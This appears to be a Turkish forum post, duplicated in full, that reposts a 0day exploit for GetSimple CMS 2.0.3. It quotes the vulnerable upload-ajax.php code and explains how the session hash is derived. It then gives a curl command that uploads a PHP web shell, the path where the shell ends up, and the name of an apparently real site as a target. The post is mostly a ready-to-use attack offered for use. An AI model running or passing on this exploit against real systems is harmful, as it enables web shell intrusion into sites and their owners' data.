Yazılım Linki => GetSimple CMS - The Fast, Extensible, and Easy Flat File Content Management System
Açıktan etkilenen versiyon => 2.0.3
Bug Code:
getsimple/admin/upload-ajax.php
if ($_REQUEST['sessionHash'] === $SESSIONHASH) {
if (!empty($_FILES))
{
$tempFile = $_FILES['Filedata']['tmp_name'];
$name = clean_img_name($_FILES['Filedata']['name']);
$targetPath = GSDATAUPLOADPATH;
$targetFile = str_replace(‘//’,'/’,$targetPath) . $name;
move_uploaded_file($tempFile, $targetFile);
Generating SESSIONHASH: md5( $salt. $sitename)
[XPL]
curl -F “[email protected];filename=shell.php” http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO
SHELL Adresiniz =>
http://getsimple_localhost/data/uploads/shell.php
Örnek Site => Running Illustrated » Login
İngilizce Kaynak => GetSimple CMS <=2.03 Remote Upload Shell (Upload-Ajax.php) 0day - BugSearch.net
Not: Alıntıdır. Haydi kalın sağlıcakla![Smile :) :)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
Açıktan etkilenen versiyon => 2.0.3
Bug Code:
getsimple/admin/upload-ajax.php
if ($_REQUEST['sessionHash'] === $SESSIONHASH) {
if (!empty($_FILES))
{
$tempFile = $_FILES['Filedata']['tmp_name'];
$name = clean_img_name($_FILES['Filedata']['name']);
$targetPath = GSDATAUPLOADPATH;
$targetFile = str_replace(‘//’,'/’,$targetPath) . $name;
move_uploaded_file($tempFile, $targetFile);
Generating SESSIONHASH: md5( $salt. $sitename)
[XPL]
curl -F “[email protected];filename=shell.php” http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO
SHELL Adresiniz =>
http://getsimple_localhost/data/uploads/shell.php
Örnek Site => Running Illustrated » Login
İngilizce Kaynak => GetSimple CMS <=2.03 Remote Upload Shell (Upload-Ajax.php) 0day - BugSearch.net
Not: Alıntıdır. Haydi kalın sağlıcakla